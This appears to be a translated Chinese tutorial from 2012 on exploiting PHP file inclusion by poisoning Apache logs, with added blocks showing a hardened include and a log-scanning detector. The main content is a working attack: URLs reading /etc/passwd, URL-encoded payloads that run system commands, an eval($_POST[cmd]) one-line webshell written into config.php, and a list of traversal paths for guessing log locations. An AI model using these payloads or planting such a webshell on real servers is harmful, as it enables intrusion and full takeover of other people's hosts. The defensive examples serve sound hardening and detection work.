        Hacker penetration on Linux: downloading a backup to get a shell

        Published: 2012/8/15 17:52:35

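        Exploiting PHP file inclusion through the Apache logs comes down to this: a submitted URL contains PHP statements, the Apache server writes them to its log, and PHP then includes the log and executes them. The biggest drawback of this approach is that the Apache log is bound to be very large, so the response will time out and so on; it therefore only works under certain conditions. Treat it purely as research. Below is my test procedure; I found it interesting, so take a look.
        For example, suppose a PHP script has an include vulnerability like this, a single vulnerable include statement:
        The following is a quoted snippet:
        <? include($zizzy); ?>   // includes the variable $zizzy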


        You can request
        http://xxx.com/z.php?zizzy=/etc/inetd.conf
        http://xxx.com/z.php?zizzy=/proc/cpuinfo
        http://xxx.com/z.php?zizzy=/etc/passwd

        and use the include statement to view system environment details and the password file.
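The include statement above next to a hardened form, as an added example that is not part of the original article. The names PAGES_DIR, PAGE_MAP, resolve_page and the page keys are hypothetical; only the parameter name zizzy comes from the article.

```php
<?php
// Added example; PAGES_DIR, PAGE_MAP and resolve_page are hypothetical names.

// Vulnerable form from the article: the request value goes straight to include.
//   include($zizzy);

const PAGES_DIR = __DIR__ . '/pages';   // assumed directory holding includable templates

// Public page names mapped to files; the request never supplies a path.
const PAGE_MAP = [
    'home'  => 'home.php',
    'about' => 'about.php',
];

function resolve_page(string $name): ?string
{
    if (!array_key_exists($name, PAGE_MAP)) {
        return null;    // /etc/passwd, log paths and ../ sequences all end here
    }
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . PAGE_MAP[$name]);
    // Defence in depth: the resolved file must exist and sit inside PAGES_DIR
    // (this also rejects a symlink that points out of the directory).
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$requested = isset($_GET['zizzy']) && is_string($_GET['zizzy']) ? $_GET['zizzy'] : 'home';
$file = resolve_page($requested);
if ($file === null) {
    http_response_code(404);
    exit('Not found');
}
include $file;
```

Setting open_basedir to the site's own directory and keeping the log directory unreadable to the PHP user keeps the log files out of reach even if another include bug remains.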

        Now let's look at log inclusion:
        Say our Apache server configuration file is located here
        /usr/local/apache/conf/httpd.conf
        Then we include httpd.conf to look at path information and the like
        http://xxx.com/z.php?zizzy=/usr/local/apache/conf/httpd.conf

        This reads out Apache's configuration; part of it is listed here.
        <VirtualHost 218.63.89.2>
        User #3
        Group silver
        ServerAdmin webmaster@xxx.com
        DocumentRoot /home/virtual/www.xxx.com
        ServerName www.xxx.com
        ServerAlias xxx.com
        ErrorLog /home/virtual/www.xxx.com/logs/www-error_log
        CustomLog /home/virtual/www.xxx.com/logs/www-access_log common
        ScriptAlias /cgi-bin/ /home/virtual/www.xxx.com/cgi-bin/
        Alias /icons/ /home/virtual/www.xxx.com/icons
        </VirtualHost>

        Submitting http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
        reads out Apache's error log:

        [Mon Jan 22 14:01:16 2005] [error] [client 218.63.194.76] File does not
        exist: /home/virtual/www.xxx.com/hack.php
        [Tus Jan 22 19:36:54 2005] [error] [client 218.63.148.38] File does not
        exist: /home/virtual/www.xxx.com/111111111.php
        [Wen Jan 23 05:14:54 2005] [error] [client 218.63.235.129] File does not
        exist: /home/virtual/www.xxx.com/22222.php3
        [Wen Jan 23 16:25:04 2005] [error] [client 218.63.232.73] attempt to invoke
        directory as script: /home/virtual/www.xxx.com/forum
        [Fir Jan 26 19:43:45 2005] [error] [client 218.63.232.73] attempt to invoke
        directory as script: /home/virtual/www.xxx.com/blog
        [Fir Jan 26 19:43:46 2005] [error] [client 64.229.232.73] attempt to invoke
        directory as script: /home/virtual/www.xxx.com/kkkkkkkk

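        The access log /home/virtual/www.xxx.com/logs/www-access_log is the same and can be read out in the same way, only the file is very large, so there is no point testing further with it. So how is this exploited?

        Say we want to submit this statement: <?phpinfo();?> // shows PHP information
        Here we can only submit it URL-encoded, because in my testing I found that the <? tag is not recorded; it is only recorded in full when it is submitted URL-encoded.

        Here %3C%3Fphpinfo%28%29%3B%3F%3E is the URL-encoded form of <?phpinfo();?>, and we submit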
        http://www.xxx.com/%3C%3Fphpinfo%28%29%3B%3F%3E

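        This is bound to produce a page-not-found error, and as soon as the error occurs it is recorded in the error log
        http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
        The log file is then included as phpinfo output, and the response becomes a page showing PHP information.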


        If it is possible (system commands can be executed, that is, when safe_mode is on),
        this works well too:
        <?system("ls+-la+/home");?>   // runs a command to list the files under home; remember to convert it to URL format.

        /home/
        total 9
        -rw-r--r--   1 www.xxx.com   silver       55 Jan 20 23:01 about.php
        drwxrwxrwx   4 www.xxx.com   silver     4096 Jan 21 06:07 abc
        -rw-r--r--   1 www.xxx.com   silver     1438 Dec 3 07:39 index.php
        -rwxrwxrwx   1 www.xxx.com   silver     5709 Jan 21 20:05 show.php  
        -rw-r--r--   1 www.xxx.com   silver     5936 Jan 18 01:37 admin.php
        -rwxrwxrwx   1 www.xxx.com   silver     5183 Jan 18 15:30 config.php3
        -rw-rw-rw-   1 www.xxx.com   silver   102229 Jan 21 23:18 info.txt
        drwxr-xr-x   2 www.xxx.com   silver     4096 Jan 8 16:03 backup
        -rw-r--r--   1 www.xxx.com   silver     7024 Dec 4 03:07 test.php

        This lists the files under home.
        Or use a one-line trojan directly, <?eval($_POST[cmd]);?>,
        which after conversion has the form %3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E.
        We submit
        http://www.xxx.com/%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E

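        The approach above is not very practical: in my testing I found the logs easily reach tens of megabytes, which makes it no fun to play with. The next idea goes a step further, writing a properly usable webshell, which is also much better than the painfully slow approach above.

        Take the same one-line trojan again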
        <?eval($_POST[cmd]);?>  

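        By now you may have realized that this is a pretty good approach. Read on: the question becomes how to write it. Use this:
        fopen opens the file /home/virtual/www.xxx.com/forum/config.php and then writes the one-line trojan server-side statement <?eval($_POST[cmd]);?> into it. Put together as a PHP statement: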

        <?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
        fclose($fp);?>   // writes the one-line trojan statement into config.php

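        We submit this statement, let Apache record it in the error log, and then include the log, which writes the shell; remember that it must be converted to URL format to succeed.
        Converted, it becomes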
        %3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
        config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
        %2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
        fclose%28%24fp%29%3B%3F%3E
        We submit
        http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
        %2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
        %22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
        cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E

        The error log now contains this line of code that writes the webshell.
        Next we include the log by submitting
        http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log

        The webshell is now written: config.php contains the one-line trojan statement.
        OK.
        http://www.xxx.com/forum/config.php is now our webshell.
        Connect with the lanker client and the host is yours.

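        PS: Everything above requires that the folder be writable; it must be -rwxrwxrwx (777) to proceed, which can be checked directly in the directory listing above. Everything above also assumes that the log path is known.

        For other log paths, you can guess, or refer to the list here.
        Appendix: some collected log paths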
        ../../../../../../../../../../var/log/httpd/access_log
        ../../../../../../../../../../var/log/httpd/error_log
        ../apache/logs/error.log
        ../apache/logs/access.log
        ../../apache/logs/error.log
        ../../apache/logs/access.log
        ../../../apache/logs/error.log
        ../../../apache/logs/access.log
        ../../../../../../../../../../etc/httpd/logs/acces_log
        ../../../../../../../../../../etc/httpd/logs/acces.log
        ../../../../../../../../../../etc/httpd/logs/error_log
        ../../../../../../../../../../etc/httpd/logs/error.log
        ../../../../../../../../../../var/www/logs/access_log
        ../../../../../../../../../../var/www/logs/access.log
        ../../../../../../../../../../usr/local/apache/logs/access_log
        ../../../../../../../../../../usr/local/apache/logs/access.log
        ../../../../../../../../../../var/log/apache/access_log
        ../../../../../../../../../../var/log/apache/access.log
        ../../../../../../../../../../var/log/access_log
        ../../../../../../../../../../var/www/logs/error_log
        ../../../../../../../../../../var/www/logs/error.log
        ../../../../../../../../../../usr/local/apache/logs/error_log
        ../../../../../../../../../../usr/local/apache/logs/error.log
        ../../../../../../../../../../var/log/apache/error_log
        ../../../../../../../../../../var/log/apache/error.log
        ../../../../../../../../../../var/log/access_log
        ../../../../../../../../../../var/log/error_log
        /var/log/httpd/access_log     
        /var/log/httpd/error_log    
        ../apache/logs/error.log    
        ../apache/logs/access.log
        ../../apache/logs/error.log
        ../../apache/logs/access.log
        ../../../apache/logs/error.log
        ../../../apache/logs/access.log
        /etc/httpd/logs/acces_log
        /etc/httpd/logs/acces.log
        /etc/httpd/logs/error_log
        /etc/httpd/logs/error.log
        /var/www/logs/access_log
        /var/www/logs/access.log
        /usr/local/apache/logs/access_log
        /usr/local/apache/logs/access.log
        /var/log/apache/access_log
        /var/log/apache/access.log
        /var/log/access_log
        /var/www/logs/error_log
        /var/www/logs/error.log
        /usr/local/apache/logs/error_log
        /usr/local/apache/logs/error.log
        /var/log/apache/error_log
        /var/log/apache/error.log
        /var/log/access_log
        /var/log/error_log
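Both stages of the technique described above leave traces in the Apache logs: a PHP open tag inside a logged request path, and a request parameter whose value is a file path to a log or system file. The following log check is an added example, not part of the original article; the function name, rule labels, host name and sample lines are constructed.

```php
<?php
// Added example; function name, rule labels and sample lines are constructed.

/** Return the rule labels that one Apache log line triggers. */
function scan_log_line(string $line): array
{
    // Undo up to three layers of percent-encoding so %3C%3F and %253C%253F both surface.
    $text = $line;
    for ($i = 0; $i < 3 && ($next = rawurldecode($text)) !== $text; $i++) {
        $text = $next;
    }

    $hits = [];
    // Rule 1: a PHP open tag has no business inside a web server log.
    if (strpos($text, '<?') !== false) {
        $hits[] = 'php-tag-in-log';
    }
    // Rule 2: a query parameter whose value uses ../, points into /etc or /proc,
    // or names an access/error log (spellings taken from the article's path list).
    if (preg_match_all('/[?&][^=&\s]+=([^&\s"]*)/', $text, $m)) {
        foreach ($m[1] as $value) {
            if (preg_match('#(^|/)\.\./|^/(etc|proc)/|(access|acces|error)[._]log$#i', $value)) {
                $hits[] = 'file-path-in-parameter';
                break;
            }
        }
    }
    return $hits;
}

// Constructed sample lines in the error-log and "common" access-log formats.
$samples = [
    '[Mon Jan 22 14:01:16 2005] [error] [client 192.0.2.10] File does not exist: /home/virtual/www.example.test/<?phpinfo();?>',
    '192.0.2.10 - - [22/Jan/2005:14:01:16 +0800] "GET /%3C%3Fphpinfo%28%29%3B%3F%3E HTTP/1.0" 404 -',
    '192.0.2.10 - - [22/Jan/2005:14:02:40 +0800] "GET /z.php?zizzy=/home/virtual/www.example.test/logs/www-error_log HTTP/1.0" 200 5120',
    '192.0.2.10 - - [22/Jan/2005:14:03:05 +0800] "GET /z.php?zizzy=/etc/passwd HTTP/1.0" 200 1312',
    '198.51.100.7 - - [22/Jan/2005:14:04:11 +0800] "GET /index.php?page=about HTTP/1.0" 200 1438',
];

foreach ($samples as $line) {
    $hits = scan_log_line($line);
    printf("%-24s %s\n", $hits ? implode(',', $hits) : 'clean', $line);
}
```

The first four sample lines are flagged and the last one is reported as clean.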

        Source: 億恩科技 [mszdt.com]
